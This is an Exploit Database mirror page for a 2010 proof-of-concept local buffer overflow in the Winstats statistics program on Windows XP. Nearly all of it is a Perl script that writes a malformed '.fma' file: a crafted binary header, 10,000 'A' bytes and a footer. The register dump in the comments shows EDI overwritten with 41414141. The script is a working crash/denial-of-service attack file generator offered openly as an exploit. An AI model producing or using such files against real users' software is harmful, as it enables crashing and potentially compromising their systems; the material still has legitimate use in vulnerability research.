Winstats – ‘.fma’ Local Buffer Overflow (PoC)

• Exploit Database
• 102 阅读

• 作者： Madjix
  日期： 2010-06-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14032/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93

  ################################################################### #Exploit Title : Winstats (.fma) local Buffer Overflow Poc #tested on windows xp SP 3 FR #Author: MadjiX #Special Greets:His0k4 [ where are you :( ] #Greets:Bibi-info , Silectovic , Volc4n0 #App: http://math.exeter.edu/rparris/peanut/wsfr32z.exe ################################################################### #-->Fenètre-->1variable-->Fichier-->Ouvrir--> Open madjix.fma file #Note:Open the file twice i dont no why #EAX 0000060E #ECX 00000000 #EDX 00D66898 #EBX 616D662E #ESP 0012F74C #EBP 0012F750 #ESI 00AD7AE0 #EDI 41414141 #EIP 00432675 wstatfr.00432675 #C 0ES 0023 32bit 0(FFFFFFFF) #P 1CS 001B 32bit 0(FFFFFFFF) #A 0SS 0023 32bit 0(FFFFFFFF) #Z 0DS 0023 32bit 0(FFFFFFFF) #S 0FS 003B 32bit 7FFDF000(FFF) #T 0GS 0000 NULL ################################################################### my $file= "MadjiX.fma";   my $hd = "\xB9\x01\x00\x00\x09\x00\x00\x00". "\x50\x00\x00\x00\x5D\x00\x00\x00". "\x00\x02\x00\x00\x00\x02\x00\x00". "\x00\x00\x00\x00\x01\x00\x00\x00". "\x3D\x00\x00\x00\xD9\xFF\xFF\xFF". "\x2C\x01\x00\x00\x64\x00\x00\x00". "\x64\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x0A";   my $ft = "\x0A\x00\x00\x00\x0A\x00\x00\x00\x0A\x00". "\x00\x00\x0C\x00\x00\x00\xF0\xFF\xFF\xFF". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00". "\x08\x02\x01\x31\x43\x6F\x75\x72\x69\x65". "\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x90\x01\x00\x00\x00\x00\x00\x02\x08". "\x02\x01\x31\x53\x79\x6D\x62\x6F\x6C\x00". "\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08". "\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72". "\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\xF5\xFF\xFF\xFF\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08". "\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72". "\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\xF0\xFF\xFF\xFF\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08". "\x02\x01\x02\x54\x69\x6D\x65\x73\x00\x72". "\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\xF5\xFF\xFF\xFF\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08". "\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72". "\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08". "\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72". "\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x09\x00\x10\x00\x00\x00\x00\x00\x00". "\x80\x20\x13\x14\x36\xF7\x57\x26\x96\x57". "\x22\x04\xE6\x57\x70\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00";   my $junk = "\x41" x 10000 ;   open($FILE,">$file"); print $FILE $hd.$junk.$ft; close($FILE);